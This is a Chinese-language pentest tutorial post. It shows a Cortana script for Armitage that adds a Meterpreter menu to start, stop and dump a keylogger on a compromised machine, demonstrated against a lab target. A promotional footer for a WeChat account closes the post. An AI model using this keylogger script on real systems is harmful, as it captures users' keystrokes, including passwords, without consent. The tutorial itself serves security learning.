# Armitage使用Cortana创建自定义菜单
通过Meterpreter会话成功连接到目标计算机之后,Cortana还可以为我们提供构建自定义菜单的功能。这里,我们创建一个监听目标主机键盘操作的自定义菜单
首先创建一个脚本menu.cna,内容如下:
popup meterpreter_bottom{
menu "&My Key Logger"{
item "&Start Key Logger"{
m_cmd($1, "keyscan_start");
}
item "&Stop Key Logger"{
m_cmd($1, "keyscan_stop");
}
item "&Show Keylogs"{
m_cmd($1, "keyscan_dump");
}
on meterpreter_keyscan_start{
println(" $3 ");
}
on meterpreter_keyscan_stop{
println(" $3 ");
}
on meterpreter_keyscan_dump{
println(" $3 ");
}
}
}
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
这段代码实现了在Meterpreter子菜单中创建一个新的弹出菜单项。不过只有成功渗透了目标计算机并取得了一个Meterpreter命令行时,这个弹出菜单才是可用的
关键字popup表示要创建一个弹出式菜单项,而函数meterpreter_bottom表示当用户在目标计算机图标上单击鼠标右键并选中Meterpreter时,这个菜单项就会出现。关键字item制定了菜单中的各个选项。,命令m_cmd会根据它们对应编号的会话将命令发送给Metasploit。
这段代码有三个选项:Start Key Logger、Stop Key Logger和Show Keylogs。分别用来开启键盘监听器、停止键盘监听器以及显示当前记录中的键盘监听数据。我们还声明了三个用来处理发送给Meterpreter的命令输出函数。
在Cortana中载入这个脚本,成功渗透目标计算机,然后在目标计算机的图表上单击鼠标右键,会弹出如下的菜单:
这里,我们单击Start Key Logger,在Cortana命令行输出了信息:
此时,我们到靶机上利用记事本随便输入几个字符
接着我们在Kali上单击Show Keylogs
效果如下:
可以看到在Cortana命令行输出了我们在靶机上输入的键盘操作。
接着,我们单击Stop Key Logger停止键盘监听
效果如下:
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!